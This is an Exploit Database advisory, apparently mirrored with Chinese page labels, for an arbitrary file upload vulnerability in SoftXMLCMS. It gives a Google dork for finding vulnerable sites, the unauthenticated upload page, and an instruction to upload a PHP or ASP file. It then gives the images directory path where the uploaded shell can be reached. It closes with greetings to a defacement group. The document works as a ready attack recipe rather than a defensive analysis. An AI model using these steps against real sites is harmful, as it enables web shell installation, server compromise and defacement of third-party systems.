SoftXMLCMS – Arbitrary File Upload

• Exploit Database
• 13 阅读

• 作者： Alexander
  日期： 2011-04-16
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/17176/

• ###########################################################################
  
  Exploit Title : softxmlcmsShell Upload Vulnerability
  
  Google Dork : Powered by softxmlcms
  
  Date : 2011-04-15 
  
  Author : *Alexander* 
  
  Software Link : http://www.softxml.com
  
  Test On : Windows/asp/php
  
  CVE : Web Applications
  
  ###########################################################################
  
  ===[ Exploit ]===
  
  http://server/[patch]/XMLEditor2.0/uploadfile1.asp
  
  Select the Choose File And Then Browse File.phpOr File.asp
  
  ===[ Upload To ]===
  
  http://server/[patch]/images/File.php
  
  Or
  
  http://server/[patch]/images/File.asp
  
  ===[ Demo ]===
  
  http://server/softxmlcms/XMLEditor2.0/uploadfile1.asp
  
  ###########################################################################
  
  Greetz : http://Ashiyane.org/Forums
  
  Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers